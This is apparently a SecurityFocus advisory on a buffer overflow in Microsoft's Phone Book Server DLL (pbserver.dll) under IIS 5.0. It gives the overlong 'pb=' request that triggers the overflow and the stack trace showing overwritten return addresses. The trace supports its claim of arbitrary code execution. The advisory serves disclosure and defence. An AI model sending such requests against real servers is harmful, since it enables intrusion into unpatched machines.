Microsoft PhoneBook Server Buffer Overflow

CORE has developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.


The Phone Book server services requests using the Internet Information Services 5.0 with URIs such as http://hostname/pbserver/

According to Microsoft's documentation a DLL (PBSERVER.DLL) is exported and the services can be used making requests with the following format:



http://hostname/pbserver/pbserver.dll?osarch=&ostype=&osver=&cmver=&lcid=&pb
ver=&pb=<STRING=db name>

In the DLL checks the total lenght to ensure that request does not exceed
1024 bytes, however it is
possible to overflow a local variable of fixed length in the DLL by sending
a request with
the following form:

GET /pbserver/pbserver.dll?&&&&&&pb=AAAAAA... (less than 980 chars)
HTTP/1.0\n\n

The result is an exception reported in the Event log with source WAM like
the following:

The HTTP server encountered an unhandled exception while processing the
ISAPI Application '
+ 0x41414143
+ 0x41414139
pbserver!HttpExtensionProc + 0x1C
wam!DllGetClassObject + 0x808
RPCRT4!NdrServerInitialize + 0x4DB
RPCRT4!NdrStubCall2 + 0x586
RPCRT4!CStdStubBuffer_Invoke + 0xC1
ole32!StgGetIFillLockBytesOnFile + 0x116EC
ole32!StgGetIFillLockBytesOnFile + 0x12415
ole32!DcomChannelSetHResult + 0xDF0
ole32!DcomChannelSetHResult + 0xD35
ole32!StgGetIFillLockBytesOnFile + 0x122AD
ole32!StgGetIFillLockBytesOnFile + 0x1210A
ole32!StgGetIFillLockBytesOnFile + 0x11E22
RPCRT4!NdrServerInitialize + 0x745
RPCRT4!NdrServerInitialize + 0x652
RPCRT4!NdrServerInitialize + 0x578
RPCRT4!RpcSmDestroyClientContext + 0x9E
RPCRT4!NdrConformantArrayFree + 0x8A5
RPCRT4!NdrConformantArrayFree + 0x3FC
RPCRT4!RpcBindingSetOption + 0x395
RPCRT4!RpcBindingSetOption + 0x18E
RPCRT4!RpcBindingSetOption + 0x4F8
KERNEL32!CreateFileA + 0x11B

For additional information specific to this message please visit the Microsoft Online Support site located at: http://www.microsoft.com/contentredirect.asp.

By sending a carefully crafted HTTP request an attacker can bypass the total length check and overflow a local variable in PBSERVER.DLL allowing the execution of arbitrary code as user GUEST on the vulnerable machine.


 

Privacy Statement
Copyright 2010, SecurityFocus